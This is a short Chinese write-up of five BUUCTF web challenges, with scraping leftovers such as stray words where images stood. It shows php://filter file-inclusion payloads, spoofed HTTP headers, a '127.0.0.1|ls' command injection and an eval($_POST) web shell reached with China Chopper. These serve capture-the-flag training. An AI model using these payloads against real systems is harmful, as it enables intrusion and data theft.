BUUCTF-Writeup
1.Web-[極客大挑戰 2019]Secret File
把一切都放在那裏了,看到奇怪的背景顏色想到可能會在背景隱藏東西試一下Ctrl+A,果真
點擊後跳轉界面
咱們能夠找到但當咱們訪問action,php時,會直接跳轉到end.php,抓包後可獲得
php
訪問可得
利用文件包含漏洞(PHP僞協議)
?file=php://filter/read=convert.base64-encode/resource=flag.php
解碼後便可獲得flag
shell
2.[ACTF2020 新生賽]Include
點開後發現URL中存在文件包含,題目名字也很直接spa
咱們利用php://filter僞協議進行文件包含
?file=php://filter/read/convert.base64-encode/resource=index.php
3d
?file=php://filter/read/convert.base64-encode/resource=flag.php
便可獲得flag
code
3.[極客大挑戰 2019]Http
查看源碼找到訪問發現blog
在http頭裏添加referer: https://www.Sycsecret.com
修改ua爲Syclover
添加X-Forwarded-for: 127.0.0.1
便可獲得flag{4e871159-20f7-45b8-8212-0eba92f7aa5c}
圖片
4.[ACTF2020 新生賽]Exec
讀源代碼發現輸入127.0.0.1|ls發現啥也沒過濾
直接cat flag
源碼
5.[極客大挑戰 2019]Knife
進來後發現很直接暗示咱們用菜刀而且告訴了咱們密碼
eval($_POST[「Syc」]);
打開菜刀直接鏈接shell便可獲得flag
it